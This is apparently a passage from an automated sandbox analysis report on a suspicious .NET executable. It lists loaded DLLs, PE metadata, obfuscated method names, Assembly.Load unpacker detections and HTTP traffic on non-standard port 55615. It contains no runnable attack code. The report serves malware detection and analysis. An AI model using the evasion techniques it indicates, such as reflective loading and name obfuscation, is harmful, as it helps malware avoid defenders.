                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PalEak0Yh6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PalEak0Yh6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: PalEak0Yh6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: SFXH.pdb source: PalEak0Yh6.exe
                  Source: Binary string: SFXH.pdbSHA256 source: PalEak0Yh6.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, nEiyoL86ujpGOOnrmF.cs.Net Code: cBSrsE9KFZ System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PalEak0Yh6.exe.295daec.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, nEiyoL86ujpGOOnrmF.cs.Net Code: cBSrsE9KFZ System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PalEak0Yh6.exe.6940000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, nEiyoL86ujpGOOnrmF.cs.Net Code: cBSrsE9KFZ System.Reflection.Assembly.Load(byte[])
                  Source: PalEak0Yh6.exeStatic PE information: 0xE175F754 [Sat Nov 12 03:30:28 2089 UTC]
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_0734D705 push FFFFFF8Bh; iretd 0_2_0734D707
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_0734D5EF push dword ptr [ebx+ebp-75h]; iretd 0_2_0734D615
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeCode function: 0_2_0734A1A0 pushad ; iretd 0_2_0734A1A1
                  Source: PalEak0Yh6.exeStatic PE information: section name: .text entropy: 7.6062064641536145
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, lOmDLMrq2au8kC0ceb.csHigh entropy of concatenated method names: 'cH2Hx5WHeG', 'V5PH8IdT4S', 'MnWHa1CS6A', 'fe2HEgJ2xe', 'IstHFw3Pcs', 'SwwH5styrK', 'NsTmJt32xmEYKDHrGr', 'GQ4cGhPBkPp9JAsq0D', 'xvlHHqLxV8', 'VutHlZ3moB'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, nEiyoL86ujpGOOnrmF.csHigh entropy of concatenated method names: 'bZkldxjfNj', 'nBalTb9ud8', 'bJ1lCmc18j', 'qqClmjQ9uC', 'dDCle7TN0Q', 'GuSlRkx3Ow', 'qbrlxBIN7N', 'JFFl8NpWpT', 'mVilw3df6u', 'l3WlaQ0GhJ'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, LAH6X7ClxPpJ45wWpf.csHigh entropy of concatenated method names: 'Dispose', 'DY3HQmo28f', 'tR4UOHyjtx', 'X15gtMeovi', 'mBMHtfQX2N', 'kaPHzF0qH1', 'ProcessDialogKey', 'TSAUAV1y8c', 'JNZUHA5y4f', 'xpLUUmMLXy'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, hMLXyctmQ4l4U61uKL.csHigh entropy of concatenated method names: 'wwRPm07TtQ', 'RIIPeiO1LB', 'CecPRMpIsG', 'tPDPxLtA0N', 'tl0PcSLbwZ', 'IjYP8fLiaK', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, nN1qJnIqyR3ywSS88K.csHigh entropy of concatenated method names: 'mJ0Y6wFQXf', 'qfLYiKKCQf', 'EDhYXN6c61', 'bBaYOKX22h', 'i2pYoIwyMw', 'rhyYBG9Vrd', 'nFiY2v00PE', 'i55YSd2e4C', 'TRfYJbZuTT', 'bMSYV1tBTU'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, PoDWFvHAB0Pjv4Nynpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IwsPVumnMH', 'pQfPuuI8xD', 'MfcPId8LW5', 'XEdPv0BAgm', 'qYDP36Jf63', 'HeRPN58Yby', 'PLdPLoMHQM'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, GeI08W2giYqeQGoGaA.csHigh entropy of concatenated method names: 'd4ExTb25q0', 'KvuxmO9rjg', 'Q3oxRbMASF', 'gD1RtiLD4n', 'o9bRzr3QN4', 'Va4xAi5ZfD', 'e13xHexSRl', 'qkaxUuZixr', 'wA1xlI9cFr', 'J8OxrAMfHf'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, aV1y8cQBNZA5y4fypL.csHigh entropy of concatenated method names: 'YMOcX6PEFq', 'WgZcO1pyAR', 'oHpc7W6MJa', 'BDpcoo4KSU', 'OHbcB6M5MW', 'SCocD19oW8', 'SBfc2TiElX', 'wdEcSIJKB8', 'S6ncGakvOI', 'tQLcJZmhZr'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, hEZbCvvqwxaRua4XvE.csHigh entropy of concatenated method names: 'qniFJ0paiO', 'G9sFu4Oujb', 'Lw4FvXxCui', 'IodF3bcpv3', 'pdgFOS3Py6', 'wRvF7Ikqmd', 'yXPFo12luj', 'Sk8FBOxPJ3', 'wxwFDUoQH6', 'IOrF2TrkBx'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, N2xeaMqIGuE7Oostw3.csHigh entropy of concatenated method names: 'FXheZJqm2d', 'uVuehFinQK', 'B87m795Ymw', 'kuOmosqejY', 'S6amB5fyOb', 'UsbmDR3dZZ', 'gSEm2pXe7E', 'pURmSBpDFx', 'zkymGjYO7w', 'GoXmJTXt7v'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, tcs3wwXstyrKs0JyIb.csHigh entropy of concatenated method names: 'xVSRdgycKy', 'TttRCURDcn', 'qZYReXG8FZ', 'XWMRxTchW7', 'r20R8pox7x', 'juoefRC8uU', 'RGheMA5uQj', 'VIfeWRqVO0', 'G3Yek8mfWl', 'emOeQN3MpH'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, pN9g13NLqTKL9XSQNY.csHigh entropy of concatenated method names: 'ToString', 'LHM5VarMl7', 'fFa5OcySRT', 'nHX57tderk', 'wKU5oD1EEm', 'NCJ5BrNJi4', 'S8W5DXbdVA', 'ukR52nplQA', 'XTH5SZQSUA', 'Lnp5GEbvAH'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, HrmZBZUxoWShOtGB1X.csHigh entropy of concatenated method names: 'sGOs4G1KF', 'XtibtKutU', 'HMMpx4QQ3', 'RkMhDjZat', 'c0NiMCAo4', 'X8qqvo5q7', 'dH7c5RM2MTFDKD0LOB', 'jb0KbOvrCRD4k37W9u', 'mq19CPOY6', 'V9wPtIodS'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, UmEaCGHHfd1kE0SjYTW.csHigh entropy of concatenated method names: 'k0WPthQ7Rf', 'xk9PzdkGjs', 'S81KAOnAuX', 'QoTKHHyJ3U', 'dOmKUWWCFm', 'YohKlGiDDN', 'AG2KrjCsND', 'djmKd2Vo2q', 'eKCKTAbHqL', 'CtiKCI6bae'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, CHfGjrGU3neQaHRn0J.csHigh entropy of concatenated method names: 'mahxydPkZ9', 'Frlxjxd4Cf', 'TnUxs2kf8X', 'zNLxbrhMEs', 'UCXxZZOEGH', 'pq8xpLgMSc', 'r76xh31biE', 'i03x6uVTpo', 'IukxiExh8d', 'RJcxqPiqk9'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, L5WHeG6W5PIdT4Sv3j.csHigh entropy of concatenated method names: 'ro2CvEuu3X', 'UlLC34u6sy', 'b5qCNrkbXQ', 'GXyCLU7WWc', 'RMwCf86E2P', 'GY5CMvRnOw', 'vYwCWIrFuc', 'uPFCkYpqZR', 'WY6CQmMfXY', 'H8cCtu4B6g'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, VhKRe4HrU2PxH5BBKjy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XuRgcpZqpR', 'OWQgP7u3qZ', 'T7agKADnXs', 'Fs3ggPLCLu', 'KvAg10Tvti', 'XJGg0Rhl8q', 'p1og4yHss8'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, PkFnD4znYTEwFpKjeC.csHigh entropy of concatenated method names: 'RDrPp2QOGq', 'SfCP6VYKOk', 'eIpPi64hwl', 'SHuPXvGqEV', 'XblPOnYfUn', 'G9jPoheuiH', 'lQBPBIEQjd', 'DHlP43OpHH', 'mW1PyxLMLM', 'aTnPjy2Sn5'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, XEBqXmWL86Y3mo28fa.csHigh entropy of concatenated method names: 'gJDcFRWBJG', 'mFIcnFtTcs', 'sY9ccohsHx', 'dT8cKY8dpA', 'y6Ec1WSCve', 'F5Pc4BYC6B', 'Dispose', 'gTT9Tylr1j', 'oHN9CJXUmG', 's8D9mHGKA5'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, UNqT3QLmOjH2lrh8tv.csHigh entropy of concatenated method names: 'FGhnaBjjb2', 'OMTnEPWqTv', 'ToString', 'OldnTI3I4L', 'TlsnCpbHko', 'jr6nm6l3aN', 'nEOneA8n6w', 'J2AnRD47O8', 'gbonxoO06P', 'eNin86PHuC'
                  Source: 0.2.PalEak0Yh6.exe.7440000.7.raw.unpack, DPHhLGinW1CS6ACe2g.csHigh entropy of concatenated method names: 'Uq5mb72Dpv', 'hkFmpZmgQI', 'WA6m6ZygS3', 'O69miquMsH', 'TBcmFsivoK', 'jpbm54rJdu', 'I78mnx2lQe', 'KKjm9L2YGj', 'D7UmcLmTYf', 'IRlmPiVSpU'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, lOmDLMrq2au8kC0ceb.csHigh entropy of concatenated method names: 'cH2Hx5WHeG', 'V5PH8IdT4S', 'MnWHa1CS6A', 'fe2HEgJ2xe', 'IstHFw3Pcs', 'SwwH5styrK', 'NsTmJt32xmEYKDHrGr', 'GQ4cGhPBkPp9JAsq0D', 'xvlHHqLxV8', 'VutHlZ3moB'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, nEiyoL86ujpGOOnrmF.csHigh entropy of concatenated method names: 'bZkldxjfNj', 'nBalTb9ud8', 'bJ1lCmc18j', 'qqClmjQ9uC', 'dDCle7TN0Q', 'GuSlRkx3Ow', 'qbrlxBIN7N', 'JFFl8NpWpT', 'mVilw3df6u', 'l3WlaQ0GhJ'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, LAH6X7ClxPpJ45wWpf.csHigh entropy of concatenated method names: 'Dispose', 'DY3HQmo28f', 'tR4UOHyjtx', 'X15gtMeovi', 'mBMHtfQX2N', 'kaPHzF0qH1', 'ProcessDialogKey', 'TSAUAV1y8c', 'JNZUHA5y4f', 'xpLUUmMLXy'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, hMLXyctmQ4l4U61uKL.csHigh entropy of concatenated method names: 'wwRPm07TtQ', 'RIIPeiO1LB', 'CecPRMpIsG', 'tPDPxLtA0N', 'tl0PcSLbwZ', 'IjYP8fLiaK', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, nN1qJnIqyR3ywSS88K.csHigh entropy of concatenated method names: 'mJ0Y6wFQXf', 'qfLYiKKCQf', 'EDhYXN6c61', 'bBaYOKX22h', 'i2pYoIwyMw', 'rhyYBG9Vrd', 'nFiY2v00PE', 'i55YSd2e4C', 'TRfYJbZuTT', 'bMSYV1tBTU'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, PoDWFvHAB0Pjv4Nynpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IwsPVumnMH', 'pQfPuuI8xD', 'MfcPId8LW5', 'XEdPv0BAgm', 'qYDP36Jf63', 'HeRPN58Yby', 'PLdPLoMHQM'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, GeI08W2giYqeQGoGaA.csHigh entropy of concatenated method names: 'd4ExTb25q0', 'KvuxmO9rjg', 'Q3oxRbMASF', 'gD1RtiLD4n', 'o9bRzr3QN4', 'Va4xAi5ZfD', 'e13xHexSRl', 'qkaxUuZixr', 'wA1xlI9cFr', 'J8OxrAMfHf'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, aV1y8cQBNZA5y4fypL.csHigh entropy of concatenated method names: 'YMOcX6PEFq', 'WgZcO1pyAR', 'oHpc7W6MJa', 'BDpcoo4KSU', 'OHbcB6M5MW', 'SCocD19oW8', 'SBfc2TiElX', 'wdEcSIJKB8', 'S6ncGakvOI', 'tQLcJZmhZr'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, hEZbCvvqwxaRua4XvE.csHigh entropy of concatenated method names: 'qniFJ0paiO', 'G9sFu4Oujb', 'Lw4FvXxCui', 'IodF3bcpv3', 'pdgFOS3Py6', 'wRvF7Ikqmd', 'yXPFo12luj', 'Sk8FBOxPJ3', 'wxwFDUoQH6', 'IOrF2TrkBx'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, N2xeaMqIGuE7Oostw3.csHigh entropy of concatenated method names: 'FXheZJqm2d', 'uVuehFinQK', 'B87m795Ymw', 'kuOmosqejY', 'S6amB5fyOb', 'UsbmDR3dZZ', 'gSEm2pXe7E', 'pURmSBpDFx', 'zkymGjYO7w', 'GoXmJTXt7v'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, tcs3wwXstyrKs0JyIb.csHigh entropy of concatenated method names: 'xVSRdgycKy', 'TttRCURDcn', 'qZYReXG8FZ', 'XWMRxTchW7', 'r20R8pox7x', 'juoefRC8uU', 'RGheMA5uQj', 'VIfeWRqVO0', 'G3Yek8mfWl', 'emOeQN3MpH'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, pN9g13NLqTKL9XSQNY.csHigh entropy of concatenated method names: 'ToString', 'LHM5VarMl7', 'fFa5OcySRT', 'nHX57tderk', 'wKU5oD1EEm', 'NCJ5BrNJi4', 'S8W5DXbdVA', 'ukR52nplQA', 'XTH5SZQSUA', 'Lnp5GEbvAH'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, HrmZBZUxoWShOtGB1X.csHigh entropy of concatenated method names: 'sGOs4G1KF', 'XtibtKutU', 'HMMpx4QQ3', 'RkMhDjZat', 'c0NiMCAo4', 'X8qqvo5q7', 'dH7c5RM2MTFDKD0LOB', 'jb0KbOvrCRD4k37W9u', 'mq19CPOY6', 'V9wPtIodS'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, UmEaCGHHfd1kE0SjYTW.csHigh entropy of concatenated method names: 'k0WPthQ7Rf', 'xk9PzdkGjs', 'S81KAOnAuX', 'QoTKHHyJ3U', 'dOmKUWWCFm', 'YohKlGiDDN', 'AG2KrjCsND', 'djmKd2Vo2q', 'eKCKTAbHqL', 'CtiKCI6bae'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, CHfGjrGU3neQaHRn0J.csHigh entropy of concatenated method names: 'mahxydPkZ9', 'Frlxjxd4Cf', 'TnUxs2kf8X', 'zNLxbrhMEs', 'UCXxZZOEGH', 'pq8xpLgMSc', 'r76xh31biE', 'i03x6uVTpo', 'IukxiExh8d', 'RJcxqPiqk9'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, L5WHeG6W5PIdT4Sv3j.csHigh entropy of concatenated method names: 'ro2CvEuu3X', 'UlLC34u6sy', 'b5qCNrkbXQ', 'GXyCLU7WWc', 'RMwCf86E2P', 'GY5CMvRnOw', 'vYwCWIrFuc', 'uPFCkYpqZR', 'WY6CQmMfXY', 'H8cCtu4B6g'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, VhKRe4HrU2PxH5BBKjy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XuRgcpZqpR', 'OWQgP7u3qZ', 'T7agKADnXs', 'Fs3ggPLCLu', 'KvAg10Tvti', 'XJGg0Rhl8q', 'p1og4yHss8'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, PkFnD4znYTEwFpKjeC.csHigh entropy of concatenated method names: 'RDrPp2QOGq', 'SfCP6VYKOk', 'eIpPi64hwl', 'SHuPXvGqEV', 'XblPOnYfUn', 'G9jPoheuiH', 'lQBPBIEQjd', 'DHlP43OpHH', 'mW1PyxLMLM', 'aTnPjy2Sn5'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, XEBqXmWL86Y3mo28fa.csHigh entropy of concatenated method names: 'gJDcFRWBJG', 'mFIcnFtTcs', 'sY9ccohsHx', 'dT8cKY8dpA', 'y6Ec1WSCve', 'F5Pc4BYC6B', 'Dispose', 'gTT9Tylr1j', 'oHN9CJXUmG', 's8D9mHGKA5'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, UNqT3QLmOjH2lrh8tv.csHigh entropy of concatenated method names: 'FGhnaBjjb2', 'OMTnEPWqTv', 'ToString', 'OldnTI3I4L', 'TlsnCpbHko', 'jr6nm6l3aN', 'nEOneA8n6w', 'J2AnRD47O8', 'gbonxoO06P', 'eNin86PHuC'
                  Source: 0.2.PalEak0Yh6.exe.3a2ec08.3.raw.unpack, DPHhLGinW1CS6ACe2g.csHigh entropy of concatenated method names: 'Uq5mb72Dpv', 'hkFmpZmgQI', 'WA6m6ZygS3', 'O69miquMsH', 'TBcmFsivoK', 'jpbm54rJdu', 'I78mnx2lQe', 'KKjm9L2YGj', 'D7UmcLmTYf', 'IRlmPiVSpU'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, lOmDLMrq2au8kC0ceb.csHigh entropy of concatenated method names: 'cH2Hx5WHeG', 'V5PH8IdT4S', 'MnWHa1CS6A', 'fe2HEgJ2xe', 'IstHFw3Pcs', 'SwwH5styrK', 'NsTmJt32xmEYKDHrGr', 'GQ4cGhPBkPp9JAsq0D', 'xvlHHqLxV8', 'VutHlZ3moB'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, nEiyoL86ujpGOOnrmF.csHigh entropy of concatenated method names: 'bZkldxjfNj', 'nBalTb9ud8', 'bJ1lCmc18j', 'qqClmjQ9uC', 'dDCle7TN0Q', 'GuSlRkx3Ow', 'qbrlxBIN7N', 'JFFl8NpWpT', 'mVilw3df6u', 'l3WlaQ0GhJ'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, LAH6X7ClxPpJ45wWpf.csHigh entropy of concatenated method names: 'Dispose', 'DY3HQmo28f', 'tR4UOHyjtx', 'X15gtMeovi', 'mBMHtfQX2N', 'kaPHzF0qH1', 'ProcessDialogKey', 'TSAUAV1y8c', 'JNZUHA5y4f', 'xpLUUmMLXy'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, hMLXyctmQ4l4U61uKL.csHigh entropy of concatenated method names: 'wwRPm07TtQ', 'RIIPeiO1LB', 'CecPRMpIsG', 'tPDPxLtA0N', 'tl0PcSLbwZ', 'IjYP8fLiaK', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, nN1qJnIqyR3ywSS88K.csHigh entropy of concatenated method names: 'mJ0Y6wFQXf', 'qfLYiKKCQf', 'EDhYXN6c61', 'bBaYOKX22h', 'i2pYoIwyMw', 'rhyYBG9Vrd', 'nFiY2v00PE', 'i55YSd2e4C', 'TRfYJbZuTT', 'bMSYV1tBTU'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, PoDWFvHAB0Pjv4Nynpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IwsPVumnMH', 'pQfPuuI8xD', 'MfcPId8LW5', 'XEdPv0BAgm', 'qYDP36Jf63', 'HeRPN58Yby', 'PLdPLoMHQM'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, GeI08W2giYqeQGoGaA.csHigh entropy of concatenated method names: 'd4ExTb25q0', 'KvuxmO9rjg', 'Q3oxRbMASF', 'gD1RtiLD4n', 'o9bRzr3QN4', 'Va4xAi5ZfD', 'e13xHexSRl', 'qkaxUuZixr', 'wA1xlI9cFr', 'J8OxrAMfHf'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, aV1y8cQBNZA5y4fypL.csHigh entropy of concatenated method names: 'YMOcX6PEFq', 'WgZcO1pyAR', 'oHpc7W6MJa', 'BDpcoo4KSU', 'OHbcB6M5MW', 'SCocD19oW8', 'SBfc2TiElX', 'wdEcSIJKB8', 'S6ncGakvOI', 'tQLcJZmhZr'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, hEZbCvvqwxaRua4XvE.csHigh entropy of concatenated method names: 'qniFJ0paiO', 'G9sFu4Oujb', 'Lw4FvXxCui', 'IodF3bcpv3', 'pdgFOS3Py6', 'wRvF7Ikqmd', 'yXPFo12luj', 'Sk8FBOxPJ3', 'wxwFDUoQH6', 'IOrF2TrkBx'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, N2xeaMqIGuE7Oostw3.csHigh entropy of concatenated method names: 'FXheZJqm2d', 'uVuehFinQK', 'B87m795Ymw', 'kuOmosqejY', 'S6amB5fyOb', 'UsbmDR3dZZ', 'gSEm2pXe7E', 'pURmSBpDFx', 'zkymGjYO7w', 'GoXmJTXt7v'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, tcs3wwXstyrKs0JyIb.csHigh entropy of concatenated method names: 'xVSRdgycKy', 'TttRCURDcn', 'qZYReXG8FZ', 'XWMRxTchW7', 'r20R8pox7x', 'juoefRC8uU', 'RGheMA5uQj', 'VIfeWRqVO0', 'G3Yek8mfWl', 'emOeQN3MpH'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, pN9g13NLqTKL9XSQNY.csHigh entropy of concatenated method names: 'ToString', 'LHM5VarMl7', 'fFa5OcySRT', 'nHX57tderk', 'wKU5oD1EEm', 'NCJ5BrNJi4', 'S8W5DXbdVA', 'ukR52nplQA', 'XTH5SZQSUA', 'Lnp5GEbvAH'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, HrmZBZUxoWShOtGB1X.csHigh entropy of concatenated method names: 'sGOs4G1KF', 'XtibtKutU', 'HMMpx4QQ3', 'RkMhDjZat', 'c0NiMCAo4', 'X8qqvo5q7', 'dH7c5RM2MTFDKD0LOB', 'jb0KbOvrCRD4k37W9u', 'mq19CPOY6', 'V9wPtIodS'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, UmEaCGHHfd1kE0SjYTW.csHigh entropy of concatenated method names: 'k0WPthQ7Rf', 'xk9PzdkGjs', 'S81KAOnAuX', 'QoTKHHyJ3U', 'dOmKUWWCFm', 'YohKlGiDDN', 'AG2KrjCsND', 'djmKd2Vo2q', 'eKCKTAbHqL', 'CtiKCI6bae'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, CHfGjrGU3neQaHRn0J.csHigh entropy of concatenated method names: 'mahxydPkZ9', 'Frlxjxd4Cf', 'TnUxs2kf8X', 'zNLxbrhMEs', 'UCXxZZOEGH', 'pq8xpLgMSc', 'r76xh31biE', 'i03x6uVTpo', 'IukxiExh8d', 'RJcxqPiqk9'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, L5WHeG6W5PIdT4Sv3j.csHigh entropy of concatenated method names: 'ro2CvEuu3X', 'UlLC34u6sy', 'b5qCNrkbXQ', 'GXyCLU7WWc', 'RMwCf86E2P', 'GY5CMvRnOw', 'vYwCWIrFuc', 'uPFCkYpqZR', 'WY6CQmMfXY', 'H8cCtu4B6g'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, VhKRe4HrU2PxH5BBKjy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XuRgcpZqpR', 'OWQgP7u3qZ', 'T7agKADnXs', 'Fs3ggPLCLu', 'KvAg10Tvti', 'XJGg0Rhl8q', 'p1og4yHss8'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, PkFnD4znYTEwFpKjeC.csHigh entropy of concatenated method names: 'RDrPp2QOGq', 'SfCP6VYKOk', 'eIpPi64hwl', 'SHuPXvGqEV', 'XblPOnYfUn', 'G9jPoheuiH', 'lQBPBIEQjd', 'DHlP43OpHH', 'mW1PyxLMLM', 'aTnPjy2Sn5'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, XEBqXmWL86Y3mo28fa.csHigh entropy of concatenated method names: 'gJDcFRWBJG', 'mFIcnFtTcs', 'sY9ccohsHx', 'dT8cKY8dpA', 'y6Ec1WSCve', 'F5Pc4BYC6B', 'Dispose', 'gTT9Tylr1j', 'oHN9CJXUmG', 's8D9mHGKA5'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, UNqT3QLmOjH2lrh8tv.csHigh entropy of concatenated method names: 'FGhnaBjjb2', 'OMTnEPWqTv', 'ToString', 'OldnTI3I4L', 'TlsnCpbHko', 'jr6nm6l3aN', 'nEOneA8n6w', 'J2AnRD47O8', 'gbonxoO06P', 'eNin86PHuC'
                  Source: 0.2.PalEak0Yh6.exe.39d27e8.2.raw.unpack, DPHhLGinW1CS6ACe2g.csHigh entropy of concatenated method names: 'Uq5mb72Dpv', 'hkFmpZmgQI', 'WA6m6ZygS3', 'O69miquMsH', 'TBcmFsivoK', 'jpbm54rJdu', 'I78mnx2lQe', 'KKjm9L2YGj', 'D7UmcLmTYf', 'IRlmPiVSpU'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
